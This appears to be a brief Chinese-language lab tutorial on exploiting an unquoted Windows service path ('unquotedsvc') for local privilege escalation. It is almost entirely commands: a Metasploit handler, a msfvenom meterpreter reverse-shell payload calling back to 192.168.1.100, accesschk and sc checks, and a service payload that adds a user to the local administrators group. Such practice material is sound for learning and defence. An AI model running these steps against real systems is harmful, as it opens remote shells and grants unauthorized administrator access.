未打引号的路径&windows本地提权

发表于 | 分类于 | 阅读数

我录制了一个演示视频

meterpreter开启监听

1
2
3
4
5
6
7
8
9
msfconsole
handler -H 192.168.1.100 -P 4444 -p windows/x64/meterpreter/reverse_tcp

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

search trusted_service
use 0
set session 1
run

查看服务权限

1
2
3
4
5
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc unquotedsvc

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe /accepteula -uwcqv user *

sc qc unquotedsvc

生成伪造的服务

1
2
3
4
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe

sc start unquotedsvc
net localgroup administrators